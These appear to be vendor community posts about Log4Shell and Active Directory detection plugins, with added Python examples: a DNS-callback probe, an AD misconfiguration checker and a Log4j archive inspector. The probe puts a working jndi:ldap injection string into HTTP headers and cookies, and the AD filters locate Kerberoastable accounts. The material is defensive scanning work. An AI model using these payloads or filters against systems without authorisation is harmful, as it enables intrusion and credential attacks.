Recent Discussions
Apache Log4j Detection Optimizations

Summary: While the operating system ultimately controls scheduling and resource allocation, we have made additional optimizations to the Apache Log4j JAR Detection (Windows) (156001) plugin to reduce resource usage while scanning entire file systems and inspecting each Java archive file on the target Windows host during the scan.

Impact: Customers should observe fewer resources being consumed on Windows scan targets during a local or Agent scan, but may also observe longer scan times. Note that the plugin timeout can be adjusted under Advanced Settings (e.g. timeout.156001) to a value other than the default of one hour to assist with performance. Also, please make sure that any security controls on the host are not interfering with the detection and possibly causing additional resource usage.

Plugin: Apache Log4j JAR Detection (Windows) (156001)

Target Release Date: January 19, 2022 (released in Nessus plugin feed 202201200227)

The plugin has been updated to no longer use 'dir' and 'findstr', since these can potentially use more resources; using PowerShell for the file system scan, while potentially slower, uses fewer resources. The plugin has also been updated to slow down the Java archive inspection in PowerShell before explicitly closing the handle. This should assist with garbage collection and result in considerably less resource usage.
Tenable Research is providing the following supporting information about the 31 NASL detection plugins and two WAS plugins recently released in response to a critical vulnerability reported in Log4j (Log4Shell). As a reminder, it is recommended that thorough tests be enabled for all scans using these CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, and CVE-2021-45105 plugins.

NASL plugins

156183 Apache Log4j 2.x < 2.17.0 DoS
- Version check for known vulnerable Log4j versions related to CVE-2021-45105 on Windows, Unix and Linux systems

156057 Apache Log4j 2.x < 2.16.0
- Version check for known vulnerable Log4j versions related to CVE-2021-45046 on Windows, Unix and Linux systems

156165 Apache Log4j 2.x < 2.16.0 RCE
- Version check for known vulnerable Log4j versions related to CVE-2021-45046 on macOS systems

156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution (Direct Check HTTP)
- Direct Check compatible with Tenable.io Cloud Scanners and restrictive networks
- Delivers jndi:ldap crafted payloads, including Session, JSession and PHPSession, into the HTTP headers and then tracks the injection via DNS when the callback is made
- Callback is needed given the nature of the vulnerability, wherein the target / victim connects back to the host sending the original request; the host is vulnerable if the callback happens
- This plugin uses DNS (default port 53) for network communication

The following Apache Log4Shell CVE-2021-44228 Direct Checks share common techniques applied on different ports and protocols. They all share the following attributes:
- Direct Checks compatible with Tenable.io Cloud Scanners and restrictive networks
- Callback is needed given the nature of the vulnerability, wherein the target / victim connects back to the host sending the original request; the host is vulnerable if the callback happens
- These plugins use DNS (default port 53) for network communication
- Deliver a jndi:ldap crafted header script to select ports on a scan target and then track the injection via DNS when the callback is made
- CVE-2021-44228 direct check not requiring authentication

156669 Apache Log4Shell RCE detection via callback correlation (Direct Check - MSRPC)
156559 Apache Log4Shell RCE detection via callback correlation (Direct Check - RPCBIND)
156445 Apache Log4Shell RCE detection via callback correlation (Direct Check - PPTP)
156375 Apache Log4Shell RCE detection via callback correlation (Direct Check - UPnP)
156258 Apache Log4Shell RCE detection via callback correlation (Direct Check - NTP)
156257 Apache Log4Shell RCE detection via callback correlation (Direct Check - DNS)
156256 Apache Log4Shell RCE detection via callback correlation (Direct Check - SNMP)
156232 Apache Log4Shell RCE detection via callback correlation (Direct Check - SMB)
156197 Apache Log4Shell RCE detection via callback correlation (Direct Check - NetBIOS)
156166 Apache Log4Shell RCE detection via callback correlation (Direct Check - SSH)
156162 Apache Log4Shell RCE detection via callback correlation (Direct Check - Telnet)
156158 Apache Log4Shell RCE detection via callback correlation (Direct Check - IMAP)
156157 Apache Log4Shell RCE detection via callback correlation (Direct Check - POP3)
156132 Apache Log4Shell RCE detection via callback correlation (Direct Check - SMTP)
156115 Apache Log4Shell RCE detection via callback correlation (Direct Check - FTP)
156056 Apache Log4Shell RCE detection via callback correlation (Direct Check - any open port)

156035 VMware vCenter Log4Shell (Direct Check HTTP)
- Delivers jndi:ldap crafted payloads into the HTTP headers of VMware vCenter applications installed on the remote host on a scan target and then tracks the injection via DNS when the callback is made

156017 Apache Log4Shell RCE detection via callback correlation (Direct Check - SIP)

156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP)

156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP)
- CVE-2021-44228 direct check not requiring authentication
- Direct Check compatible with Tenable.io Cloud Scanners and restrictive networks
- Injects payload into the HTTP headers and then tracks the injection via DNS when the callback is made
- Callback is needed given the nature of the vulnerability, wherein the target / victim connects back to the host sending the original request; the host is vulnerable if the callback happens
- This plugin uses DNS (default port 53) for network communication

155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check)
- CVE-2021-44228 direct check not requiring authentication
- Scanner sends a jndi:ldap string to the target and listens for an LDAP BIND request from the target
- Not compatible with Tenable.io cloud scanners, and may fail to return results in certain networks due to firewall rules or interference from other security devices
- Callback is needed given the nature of the vulnerability, wherein the target / victim connects back to the host sending the original request; the host is vulnerable if the callback happens
- This plugin uses ephemeral ports 50,000-60,000 for network communication

156001 Apache Log4j JAR Detection (Windows)
- Local Windows detection (Thorough Tests recommended)
- Checks running processes for Java instances running with Log4j in the classpath and records the file paths
- Searches the file system for .jar files with known vulnerable Log4j filename matches (if thorough tests are enabled)

156000 Apache Log4j Installed (Unix)
- Local Linux detection
- Checks rpm packages for vulnerable Log4j matches (RedHat, Gentoo, SuSE, etc.)
- Searches the file system paths for known vulnerable Log4j matches (if thorough tests are enabled)

155999 Apache Log4j < 2.15.0 Remote Code Execution
- Local Linux detection (uses 156000)
- Version check for known vulnerable Log4j versions on Unix and Linux systems

156002 Apache Log4j < 2.15.0 Remote Code Execution
- Local Windows detection (uses 156001)
- Version check for known vulnerable Log4j versions on Windows systems

156032 EOL plugin for Log4j 1.x
- Apache Log4j version < 1.x End of Life / Unsupported Version Detection

156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)
- The version of Apache Log4j on the remote host is 1.2. It is, therefore, affected by a remote code execution vulnerability when specifically configured to use JMSAppender.

WAS plugins

113075 Apache Log4j Remote Code Execution (Log4Shell)
- CVE-2021-44228 direct check not requiring authentication
- Injects payload into the HTTP headers, POST/GET values, XML, JSON, cookies, etc. and then tracks the injection via DNS when the callback is made
- Callback is needed given the nature of the vulnerability, wherein the target / victim connects back to the host sending the original request; the host is vulnerable if the callback happens

113076 Apache Log4j Remote Code Execution (Log4Shell) CVE-2021-44228
- WAS Log4Shell file detection plugin
- Scans the web application directories for known vulnerable versions of the Log4j installation file and flags the host if found
Apache Log4j Detection Improvements

Summary: Since CVE-2021-44228 was first announced, Tenable has been working diligently on improving the local detections for Apache Log4j on Windows, Linux, and Unix operating systems based on additional research, testing, telemetry, and customer feedback. Due to the urgency and need for Log4j detections, these improvements have been released as soon as they were well tested and reviewed. After customer feedback and careful consideration, we have removed the requirement for thorough tests, which will lead to fewer false negatives but will require more resources than scans previously run without thorough tests enabled.

The improvements that have been released or will be released shortly include:

Apache Log4j Installed (Linux / Unix) (156000)
- Utilize the 'locate' command (if available) over the 'find' command
- Use the same parameters for the 'find' command regardless of the thorough tests setting
- Search for and inspect all Java archive files (JAR, WAR, EAR) that can contain Log4j
- Does not recursively extract nested Java archive files due to potential performance and resource issues
- Check the log4j-core JAR file for JndiLookup.class
- Check running processes for a Log4j JAR supplied in the command line arguments
- Expanded package manager checks to additional OSes
- Fixed a regression that was causing certain 1.x versions to be excluded
- Increased data collection
- Optimizations and Agent enablement for scans against macOS hosts
- Increased timeouts

Apache Log4j JAR Detection (Windows) (156001)
- The file system search was originally performed by an upstream plugin (152357) but has been implemented in 156001 to allow for an optimized file system search for Java archive files (JAR, WAR, EAR), resulting in a considerable performance gain. Note that the thorough tests requirement was removed to run the file system search.
- Search for and inspect all Java archive files that can contain the Log4j JAR file
- Does not recursively extract nested Java archive files due to potential performance and resource issues
- Check the log4j-core JAR file for JndiLookup.class

Tenable is working on and will continue to explore additional enhancements.

Impact: Customers should expect to see improved local detection of Apache Log4j, potentially resulting in an increase in new vulnerability detections and longer scan times. Note that any scans with plugins 156000, 156001, or plugins that depend on these detection plugins enabled may take longer due to the expanded detection methods.

Plugins: Apache Log4j Installed (Linux / Unix) (156000); Apache Log4j JAR Detection (Windows) (156001)

Target Release Date:
- December 22, 2021: Improvements for Apache Log4j JAR Detection (Windows) (156001) - released in Nessus plugin feed 202112230037
- December 27, 2021 (Nessus plugin feed 202112280531): Inclusion of WAR and EAR files in Apache Log4j Installed (Linux / Unix) (156000); JndiLookup.class check in Apache Log4j JAR Detection (Windows) (156001)
- The other improvements for Apache Log4j Installed (Linux / Unix) (156000) have been recently or previously released.
Tenable Research Release Highlight: Nessus Agent Reset Plugin and Scan Template

Summary: Tenable Research has released a Credentialed Scan plugin and Scan Template, "Nessus 10.8.0 / 10.8.1 Agent Reset", in support of addressing the issues in Nessus Agent 10.8.0 and 10.8.1.

Change:
- New Scan Template: "Nessus 10.8.0 / 10.8.1 Agent Reset"
- Pre-requisite: Ensure that the agent version is set to 10.8.2 or 10.7.x in the Agent Profile (for TVM) and Nessus Manager (for TSC).
- This Scan Template and Credentialed Scan plugin will run OS-specific scripts to remotely reset the agent plugins on Windows, Mac OS or 'Nix based Nessus Agent host machines on 10.8.0 or 10.8.1. These scripts and the permission level each script requires are detailed in the Nessus Agent 10.8.2 Release Notes (https://docs.tenable.com/release-notes/Content/nessus-agent/2025.htm#10.8.2) under the "Perform a plugin reset" section.

Notes:
- The Nessus Agent Reset plugin will only run from the provided Scan Template and will not reset Nessus Agents when run from any other Scan Template.
- For Ubuntu/Debian Unix credentials, please ensure that only one set of privilege escalation credentials is provided, with the permission level required for the OS script to execute.
- 13 JAN 2025 UPDATE: Please note that triggering a plugin reset will result in a large spike in network traffic.

Impact: Without this script, customers would have to log on to each Nessus Agent host and run the appropriate Nessus Agent Reset script for that host OS. Using this Scan Template and Credentialed Scan plugin, customers can run the Nessus Agent Reset scripts on each updated Nessus Agent from a remote credentialed scan, with the necessary credentials and permissions, using Nessus, Nessus Manager, T.VM, and T.SC (released 08 JAN).

Target Release Date: 07 JAN 2025
Apache Log4j Detection for Windows - Manifest / Properties Detection Update

Summary: In light of the resource requirements to scan entire file systems while inspecting each Java archive file in depth and checking the manifest and properties files, we have decided to require that the following settings be enabled to leverage the detection using manifest and properties files in Apache Log4j JAR Detection (Windows) (156001):
- 'Perform thorough tests' setting must be enabled
- 'Override normal accuracy' setting must be set to 'Show potential false alarms'

This feature was first released in Nessus plugin feed 202201080412. We are looking at ways to further optimize this feature to enable faster scans while lowering its impact on system resources.

Impact: Customers may observe fewer resources being consumed on Windows scan targets during a local or Agent scan, but may also observe slightly fewer Apache Log4j detections than were detected via the manifest or properties file over the past several days. Once the 'Perform thorough tests' and 'Override normal accuracy' settings are configured as mentioned above, the detections should re-appear. A consequence of this change is that some Apache Log4j vulnerabilities may appear as remediated if they were previously detected via this method and subsequent scans did not have the aforementioned settings enabled.

Plugin: Apache Log4j JAR Detection (Windows) (156001)

References: Assessment Scan Settings - Perform thorough tests and Override normal accuracy settings

Target Release Date: January 12, 2022 (released in Nessus plugin feed 202201130817)
Overview of Callbacks in Log4j Remote Detection Plugins

The following is an overview of callbacks in Tenable plugins for Log4Shell that perform remote detection: 155998, 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166, 156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669.

An HTTP request is sent by the scanner to the target being scanned with a benign payload containing a unique token. The target, if vulnerable, will act on the payload. Tenable tracks the target's action on the payload via a callback to our hosted environment (plugins 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166, 156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669), based on the unique token that was embedded in the initial request, or via the LDAP connection callback to the scanner for plugin 155998. The callback is needed given the nature of the vulnerability, as execution of the payload happens on the target being scanned.

In plugin 155998, the callback happens to the scanner. This is the reason the plugin is not supported on Tenable.io cloud scanners.

In plugins 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166, 156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669, as part of execution of the payload, the target tries to resolve a domain owned by Tenable. While resolving the domain, Tenable is able to see the unique token that was sent in the initial request and thereby can track the callback.

These plugins come with the major benefit that credentials are not required for scanning. However, the callbacks need to be successful for the plugin to be able to identify the exposure. Hence, communication between the target being scanned and the callback server must not be interrupted by intermediary devices.

For more details:
https://community.tenable.com/s/feed/0D53a00008E3hKzCAJ
https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
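The token-based correlation the post above describes, as an added example that is not Tenable's plugin code: the scanner embeds a unique, per-header token in the jndi:ldap lookup string, and a later DNS query for token.zone at the zone's authoritative server proves that the target evaluated the payload. Assumptions of this example: the zone callback.example is one the scanner operator controls and logs queries for (the real plugins use a Tenable-hosted domain), the header set and the JSESSIONID/PHPSESSID cookie names are illustrative, and the query-log lines are constructed in BIND's query-log style. The absence of a callback is reported as indeterminate rather than as "not vulnerable", for the reason the post gives: an intermediary blocking the lookup produces the same silence as a patched host.

```python
"""Scanner-side callback correlation for a Log4Shell check (added example, not Tenable's plugin code)."""
import re
import secrets
from dataclasses import dataclass

CALLBACK_ZONE = "callback.example"  # assumption: a zone whose authoritative server we run and log


@dataclass(frozen=True)
class Probe:
    token: str
    target: str
    port: int
    header: str


def new_token() -> str:
    # 16 lowercase hex characters: a valid DNS label and not guessable by a third party
    return secrets.token_hex(8)


def payload_for(token: str) -> str:
    # A vulnerable logger resolves TOKEN.CALLBACK_ZONE while evaluating this lookup string.
    return "${jndi:ldap://%s.%s/a}" % (token, CALLBACK_ZONE)


def build_probes(target: str, port: int,
                 headers=("User-Agent", "X-Forwarded-For", "Cookie")) -> list:
    # One token per injection point, so the callback also tells us which header was logged.
    return [Probe(new_token(), target, port, h) for h in headers]


def render_request(probe: Probe) -> str:
    value = payload_for(probe.token)
    if probe.header == "Cookie":  # illustrative cookie names; the plugin post names Session/JSession/PHPSession
        value = "JSESSIONID=%s; PHPSESSID=%s" % (value, value)
    return ("GET / HTTP/1.1\r\nHost: %s:%d\r\n%s: %s\r\nConnection: close\r\n\r\n"
            % (probe.target, probe.port, probe.header, value))


QUERY_RE = re.compile(r"query:\s+(?P<qname>\S+)\s+IN\s+")


def tokens_seen(dns_log_lines) -> set:
    """Tokens observed as the label immediately under CALLBACK_ZONE in query-log lines."""
    seen = set()
    suffix = "." + CALLBACK_ZONE
    for line in dns_log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()  # DNS is case-insensitive; resolvers may randomise case
        if qname.endswith(suffix):
            seen.add(qname[: -len(suffix)].split(".")[-1])
    return seen


def correlate(probes, dns_log_lines) -> dict:
    seen = tokens_seen(dns_log_lines)
    return {"confirmed": [p for p in probes if p.token in seen],
            # No callback is indeterminate: not vulnerable, or the lookup was blocked in transit.
            "no_callback": [p for p in probes if p.token not in seen]}


def demo():
    probes = build_probes("198.51.100.20", 8080)
    # Constructed query-log lines (BIND style) from the callback zone's server: the first two are the
    # Cookie probe's token (once case-randomised by a resolver), the third is unrelated noise.
    log = [
        "29-Dec-2021 10:15:02.117 client 198.51.100.20#51344: query: %s.callback.example IN A +"
        % probes[2].token.upper(),
        "29-Dec-2021 10:15:02.118 client 198.51.100.20#51344: query: %s.callback.example IN AAAA +"
        % probes[2].token,
        "29-Dec-2021 10:15:03.004 client 203.0.113.9#40001: query: www.example.org IN A +",
    ]
    return probes, correlate(probes, log)
```

Running demo() reports the Cookie probe as confirmed and the other two headers as no_callback; a real scan would send render_request(probe) for each probe and feed the zone's query log to correlate() after a wait.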
Active Directory Starter Scan

Background: As part of our endeavor to help reduce our customers' cyber exposure, we are releasing a Starter Scan template along with plugins that will peel the onion around Active Directory security. We hope customers will leverage these plugins as a starting point and consider an Active Directory Vulnerability Management solution for more holistic determination, given that Active Directory breaches are ever-increasing and extremely devastating.

Change: Ten plugins checking for common Active Directory misconfigurations / vulnerabilities are being released. Active Directory controller credentials will be required for these plugins to run. Active Directory-specific scan templates are also being released for Nessus Professional, Tenable.sc and Tenable.io. Dashboards for Tenable.sc and Tenable.io will also be available.

Impact: Customers will be able to run scans highlighting Active Directory issues. Note that these are starter Active Directory checks. For more complete coverage, we strongly recommend considering an Active Directory VM solution. Note that these plugins are not available on Nessus Agents.

Plugins:
150480 AD Starter Scan - Kerberoasting
150481 AD Starter Scan - Weak Kerberos encryption
150482 AD Starter Scan - Kerberos Pre-authentication Validation
150483 AD Starter Scan - Non-Expiring Account Password
150484 AD Starter Scan - Kerberos Krbtgt
150485 AD Starter Scan - Unconstrained delegation
150486 AD Starter Scan - Dangerous Trust Relationship
150487 AD Starter Scan - Primary Group ID integrity
150488 AD Starter Scan - Null sessions
150489 AD Starter Scan - Blank passwords

Release Date: Thursday 29 July 2021
Posted by: Anonymous (4 years ago)
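What eight of the ten starter checks above look for in directory data, as an added example that is not Tenable's plugin code: the script evaluates constructed LDAP-style entries against the userAccountControl bits, msDS-SupportedEncryptionTypes, primaryGroupID and krbtgt pwdLastSet conditions behind Kerberoasting, weak Kerberos encryption, pre-authentication, non-expiring passwords, krbtgt age, unconstrained delegation, primary group ID integrity and blank passwords, and lists equivalent LDAP search filters for those that reduce to a single filter. Assumptions of this example: the sample entries and domain names are invented, the 180-day krbtgt threshold is a choice of this example, accounts with an explicit msDS-SupportedEncryptionTypes value that has no AES bit are treated as weak, and Domain Users is the only primary group considered normal for a user object. Dangerous trust relationships and null sessions need trustedDomain objects and registry data that are not modelled here.

```python
"""Offline evaluation of common AD misconfigurations (added example, not Tenable's plugin code)."""
from datetime import datetime, timedelta, timezone

# userAccountControl bits (Microsoft-documented values)
ACCOUNTDISABLE = 0x0000002
PASSWD_NOTREQD = 0x0000020
DONT_EXPIRE_PASSWORD = 0x0010000
TRUSTED_FOR_DELEGATION = 0x0080000
USE_DES_KEY_ONLY = 0x0200000
DONT_REQ_PREAUTH = 0x0400000
# msDS-SupportedEncryptionTypes bits
DES_BITS = 0x01 | 0x02
AES_BITS = 0x08 | 0x10
DOMAIN_USERS, DOMAIN_COMPUTERS, DOMAIN_CONTROLLERS = 513, 515, 516
KRBTGT_MAX_AGE = timedelta(days=180)  # assumption: rotation threshold chosen for this example
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
NOW = datetime(2021, 7, 29, tzinfo=timezone.utc)  # fixed "now" so the sample evaluates deterministically

# Equivalent LDAP filters (1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND).
LDAP_FILTERS = {
    "Kerberoasting": "(&(objectCategory=person)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))"
                     "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))",
    "Kerberos pre-authentication not required":
        "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))",
    "Non-expiring password": "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=65536))",
    "Blank password allowed": "(userAccountControl:1.2.840.113556.1.4.803:=32)",
    "Unconstrained delegation":
        "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))",
}


def filetime_to_datetime(ft: int) -> datetime:
    return EPOCH_1601 + timedelta(microseconds=ft // 10)  # FILETIME is 100-ns units since 1601


def datetime_to_filetime(dt: datetime) -> int:
    return int((dt - EPOCH_1601) / timedelta(microseconds=1)) * 10


def evaluate(entry: dict, now: datetime) -> list:
    uac = int(entry.get("userAccountControl", 0))
    is_user = entry.get("objectClass") == "user"  # machine accounts carry "computer"
    name = entry["sAMAccountName"]
    disabled = bool(uac & ACCOUNTDISABLE)
    hits = []
    if is_user and not disabled and name.lower() != "krbtgt" and entry.get("servicePrincipalName"):
        hits.append("Kerberoasting")  # any enabled user with an SPN can have a TGS requested for it
    enc = entry.get("msDS-SupportedEncryptionTypes")
    if uac & USE_DES_KEY_ONLY or (enc is not None and ((int(enc) & DES_BITS) or not (int(enc) & AES_BITS))):
        hits.append("Weak Kerberos encryption")
    if is_user and not disabled and uac & DONT_REQ_PREAUTH:
        hits.append("Kerberos pre-authentication not required")  # AS-REP roastable
    if is_user and uac & DONT_EXPIRE_PASSWORD:
        hits.append("Non-expiring password")
    if name.lower() == "krbtgt" and now - filetime_to_datetime(int(entry.get("pwdLastSet", 0))) > KRBTGT_MAX_AGE:
        hits.append("Stale krbtgt password")  # old krbtgt keys keep forged tickets valid
    if uac & TRUSTED_FOR_DELEGATION and int(entry.get("primaryGroupID", 0)) != DOMAIN_CONTROLLERS:
        hits.append("Unconstrained delegation")  # legitimate on DCs, dangerous elsewhere
    allowed = {DOMAIN_USERS} if is_user else {DOMAIN_COMPUTERS, DOMAIN_CONTROLLERS}
    if int(entry.get("primaryGroupID", DOMAIN_USERS if is_user else DOMAIN_COMPUTERS)) not in allowed:
        hits.append("Primary group ID integrity")  # e.g. 512 hides Domain Admins membership from member lists
    if uac & PASSWD_NOTREQD:
        hits.append("Blank password allowed")
    return hits


# Constructed entries shaped like LDAP search results (not from a real domain).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "objectClass": "user", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"], "msDS-SupportedEncryptionTypes": 4,
     "primaryGroupID": 513},
    {"sAMAccountName": "jdoe", "objectClass": "user", "userAccountControl": 0x200, "primaryGroupID": 513},
    {"sAMAccountName": "legacy_app", "objectClass": "user", "userAccountControl": 0x200 | 0x400000 | 0x20,
     "primaryGroupID": 513},
    {"sAMAccountName": "krbtgt", "objectClass": "user", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"], "primaryGroupID": 513,
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=400))},
    {"sAMAccountName": "helpdesk", "objectClass": "user", "userAccountControl": 0x200, "primaryGroupID": 512},
    {"sAMAccountName": "APP01$", "objectClass": "computer", "userAccountControl": 0x1000 | 0x80000,
     "primaryGroupID": 515},
    {"sAMAccountName": "DC01$", "objectClass": "computer", "userAccountControl": 0x2000 | 0x80000,
     "primaryGroupID": 516},
]


def run_starter_checks(entries=SAMPLE_ENTRIES, now=NOW) -> dict:
    return {e["sAMAccountName"]: evaluate(e, now) for e in entries}
```

run_starter_checks() flags svc_sql for Kerberoasting, RC4-only encryption and a non-expiring password, legacy_app for missing pre-authentication and PASSWD_NOTREQD, the stale krbtgt key, helpdesk's primary group of 512, and APP01$ for unconstrained delegation, while DC01$ and jdoe come back clean. The LDAP_FILTERS strings can be pasted into ldapsearch or PowerShell's Get-ADObject -LDAPFilter to get the same results from a live domain.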
Security End-of-Life Plugins

Target Release Date: Immediate

Change: Tenable Research is releasing a new dynamic and well-defined framework for detecting Security End-of-Life (SEoL) vulnerabilities. It abstracts various terminologies, such as End of Life, Unsupported, End of Support, etc., and provides a clear definition that serves as the basis for SEoL detection plugins. The new framework defines SEoL as the state in the Security Maintenance Lifecycle when a product no longer receives security updates.

Impact: Tenable Research is implementing a new policy that informs the SEoL plugin framework design. To better convey the impact of SEoL products in our customer environments, Tenable is adopting a strategy that allows plugin severity to be more flexible and encourages scaling up instead of down. For this reason, net-new SEoL plugins will default to the INFO severity value. The new SEoL plugins can be identified by the Plugin Name attribute, which will contain "SEoL", such as "Apache httpd SEoL (2.1.x <= x <= 2.2.x)". Alternatively, they can be identified through the "unsupported_by_vendor: true" plugin attribute.

Additional Notes: Please note that any existing plugins for the SEoL use case containing "Unsupported" in the plugin name will be converted according to the new "SEoL" plugin specification or enter the deprecation process. Plugin severity will retain its originating value during these conversions. A public Knowledge Article was published to help answer any questions regarding the new plugins. For a more detailed description of the problem and Tenable's solution, please refer to the blog "What Security Leaders Need to Know About Security End of Life: How Tenable is Leading the Way".
Apache Log4j Detection Additional Improvements

Summary: Additional improvements have been made to the Windows and Linux / Unix detection plugins for Apache Log4j. The improvements that have been recently released or will be released by the target release date include:

Apache Log4j Installed (Linux / Unix) (156000)
- When the filename matches Log4j, the manifest and properties files will now be checked, and the version in one of these files will supersede the version from the filename. For example, if 'log4j-core-2.15.0.jar' is found but the manifest file has a version of '2.16.0', then '2.16.0' will be reported as the version.
- The Spotlight search via the 'mdfind' command will be used on macOS hosts that have indexing enabled when the 'Perform thorough tests' setting is not enabled.
- Improved handling of partial results when the plugin would normally time out. Note: the plugin timeout can be adjusted under Advanced Settings (i.e. timeout.156000).

Apache Log4j JAR Detection (Windows) (156001)
- When the filename matches Log4j and the following scan preferences are configured, the manifest and properties files will be checked and the version in one of these files will supersede the version from the filename:
  - 'Perform thorough tests' setting is enabled
  - 'Override normal accuracy' setting is set to 'Show potential false alarms'
- Additional debugging has been added to assist in diagnosing potential issues.
- Improved handling of partial results when the plugin would normally time out. Note: the plugin timeout can be adjusted under Advanced Settings (i.e. timeout.156001).

Please open a technical support ticket if you have an issue so that we can collect the required information to diagnose and assist you with your issue.

Impact: Customers should expect to see improved local detection of Apache Log4j, potentially resulting in an increase in new vulnerability detections and potentially longer scan times.

Plugins: Apache Log4j Installed (Linux / Unix) (156000); Apache Log4j JAR Detection (Windows) (156001)

Target Release Date: March 17, 2022

Update: Changes to 156000 went out in Nessus plugin feed 202203172204. Changes to 156001 were delayed (ETA: March 25); these changes went out in Nessus plugin feed 202203251548.
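As an added example that is not Tenable's plugin code, the following Python script reproduces the local inspection logic described in the Log4j detection posts above (the 156000 / 156001 improvements and the manifest / properties update, with the version thresholds of the 155999, 156002, 156057 and 156183 version checks): walk a tree for JAR, WAR and EAR files, let the version in pom.properties or the manifest supersede the version in the filename (the post's 'log4j-core-2.15.0.jar' with a 2.16.0 manifest case), check for JndiLookup.class, report log4j-core JARs nested in a WAR by filename without extracting them, and map the result to CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105. The archives it builds in a temporary directory are constructed stand-ins, not real Log4j binaries; the CVE mapping covers only the mainline 2.x branch and treats an un-extracted nested JAR as if JndiLookup.class were present, both assumptions of this example.

```python
"""Local Log4j archive inspection (added example, not Tenable plugin code)."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass, field
from typing import Optional

ARCHIVE_EXTS = (".jar", ".war", ".ear")
CORE_NAME_RE = re.compile(r"^log4j-core-(\d+(?:\.\d+)+)\.jar$", re.IGNORECASE)
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


@dataclass
class Finding:
    path: str                    # archive path, or "outer!inner" for a nested JAR
    version: Optional[str]
    version_source: str          # pom.properties | manifest | filename | nested filename | none
    jndi_lookup: Optional[bool]  # None = unknown (nested archives are not extracted)
    cves: list = field(default_factory=list)


def parse_version(text: str) -> tuple:
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def cves_for(version: Optional[str], jndi_lookup: Optional[bool]) -> list:
    """Mainline 2.x thresholds only (assumption: the 2.3.x / 2.12.x backport
    branches are not modelled). Unknown JndiLookup state counts as present."""
    if version is None:
        return []
    v = parse_version(version)
    if v < (2, 0, 0):
        return []  # 1.x: CVE-2021-4104 needs a JMSAppender config check, not a version check
    jndi = jndi_lookup is not False
    cves = []
    if v < (2, 15, 0) and jndi:
        cves.append("CVE-2021-44228")
    if v < (2, 16, 0) and jndi:
        cves.append("CVE-2021-45046")
    if v < (2, 17, 0):
        cves.append("CVE-2021-45105")  # recursion DoS, independent of JndiLookup.class
    return cves


def _version_from_member(zf: zipfile.ZipFile, member: str, keys) -> Optional[str]:
    text = zf.read(member).decode("utf-8", "replace")
    for key in keys:
        m = re.search(r"^%s\s*[:=]\s*(\S+)" % re.escape(key), text, re.MULTILINE)
        if m:
            return m.group(1)
    return None


def inspect_archive(path: str) -> list:
    findings = []
    with zipfile.ZipFile(path) as zf:  # handle is closed as soon as inspection ends
        names = set(zf.namelist())
        m = CORE_NAME_RE.match(os.path.basename(path))
        if m or POM_PROPS in names:
            version, source = (m.group(1), "filename") if m else (None, "none")
            # Metadata inside the archive supersedes the version in the filename.
            if POM_PROPS in names:
                v = _version_from_member(zf, POM_PROPS, ("version",))
                version, source = (v, "pom.properties") if v else (version, source)
            elif MANIFEST in names:
                v = _version_from_member(zf, MANIFEST, ("Implementation-Version", "Bundle-Version"))
                version, source = (v, "manifest") if v else (version, source)
            f = Finding(path, version, source, JNDI_LOOKUP in names)
            f.cves = cves_for(version, f.jndi_lookup)
            findings.append(f)
        # Nested JARs (e.g. WEB-INF/lib inside a WAR) are reported by filename only, never extracted.
        for n in sorted(names):
            nm = CORE_NAME_RE.match(n.rsplit("/", 1)[-1])
            if nm:
                f = Finding(path + "!" + n, nm.group(1), "nested filename", None)
                f.cves = cves_for(f.version, None)
                findings.append(f)
    return findings


def scan_tree(root: str) -> list:
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXTS):
                try:
                    findings.extend(inspect_archive(os.path.join(dirpath, name)))
                except (zipfile.BadZipFile, OSError):
                    continue  # not a ZIP container, or unreadable
    return sorted(findings, key=lambda f: f.path)


def _make_jar(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed stand-ins for real archives (member contents are placeholders)."""
    os.makedirs(os.path.join(root, "lib"))
    samples = {
        # Filename says 2.15.0 but the manifest says 2.16.0: the manifest wins.
        "lib/log4j-core-2.15.0.jar": _make_jar({MANIFEST: "Manifest-Version: 1.0\nImplementation-Version: 2.16.0\n",
                                               JNDI_LOOKUP: b"\xca\xfe\xba\xbe"}),
        # Renamed 2.14.1 with JndiLookup.class removed: pom.properties still reveals the version.
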